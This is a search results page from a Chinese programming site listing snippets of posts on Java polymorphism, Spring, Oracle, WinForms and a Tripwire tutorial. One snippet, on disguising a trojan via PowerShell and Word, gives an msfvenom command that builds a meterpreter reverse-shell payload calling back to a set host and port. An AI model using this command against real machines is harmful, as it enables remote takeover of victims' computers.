码迷,mamicode.com
首页 >  
搜索关键字:buddy system    ( 49281个结果
Java之多态
多态的概述 什么是多态 同一个对象,在不同时刻表现出来的不同形态 多态的前提 1.要有继承或实现关系 2.要有方法的重写 3.要有父类引用指向子类对象 代码演示 class Animal { public void eat() { System.out.println("动物吃饭"); } } cl ...
分类:编程语言   时间:2021-03-29 12:34:46    阅读次数:0
【Java】用键盘输入若干数字,以非数字字符结束,计算这些数的和和平均值
package com.company; import java.util.*; public class Main { public static void main(String arg[]) { Scanner input = new Scanner(System.in); double su ...
分类:编程语言   时间:2021-03-29 12:09:58    阅读次数:0
Reflection
1.通过System.Reflection.Assembly 的一些方法得到想要创建的对象的type 2.调用Activator.CreateInstance(type,args) ,创建相应的instance ...
分类:其他好文   时间:2021-03-26 15:31:05    阅读次数:0
Spring IOC学习(2)
xml配置默认使用类的无参构造 #当类存在有参构造函数时 package Test; public class Hello { private String name; public Hello(){ System.out.println("Hello对象被创建"); } public Hello( ...
分类:编程语言   时间:2021-03-26 15:22:42    阅读次数:0
Oracle-配置单实例数据库在linux环境跟随系统自启动
方法一、配置shell脚本,使用/etc/rc.local 跟随系统自启动 # cat /home/oracle/script/start.sh lsnrctl start<<EOF EOF sqlplus / as sysdba <<EOF startup alter system registe ...
分类:数据库   时间:2021-03-26 15:17:47    阅读次数:0
Winform基础详解三——关于program.cs
Winform基础详解三——关于program.cs program是整个Winform程序的主入口点。 [STAThread] 表示一种当前应用程序的特性 表示当前COM线程模型是单线程单元 如果没有它,winform应用程序是无法工作的 using System; using System.Co ...
分类:Windows程序   时间:2021-03-18 14:35:52    阅读次数:0
Tripwire Tutorial: Linux Host Based Intrusion Detection System
Tripwire is a host based Intrusion detection system for Linux. Tripwire monitors Linux system to detect and report any unauthorized changes to the fil ...
分类:系统相关   时间:2021-03-18 14:32:34    阅读次数:0
Scanner进阶使用
1 package com.pingfan.scanner; 2 3 import java.util.Scanner; 4 5 public class Demo3 { 6 public static void main(String[] args) { 7 Scanner scanner = n ...
分类:其他好文   时间:2021-03-18 14:30:41    阅读次数:0
Powershell配合word伪装木马执行
环境: win7 64位,word2013 生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1122 -f psh-reflection >x.ps1 ? 放到VPS上,这里我们放到本机搭 ...
分类:系统相关   时间:2021-03-18 14:14:35    阅读次数:0
Hello,world!
HelloWord 新建文件夹,存放代码 新建一个Java文件 文件后缀名.java(Hello.java) 编写代码 public class Hello{ public static void main(String[] args){ System.out.print("Hello,world! ...
分类:其他好文   时间:2021-03-18 14:11:04    阅读次数:0
49281条   上一页 1 ... 37 38 39 40 41 ... 4929 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!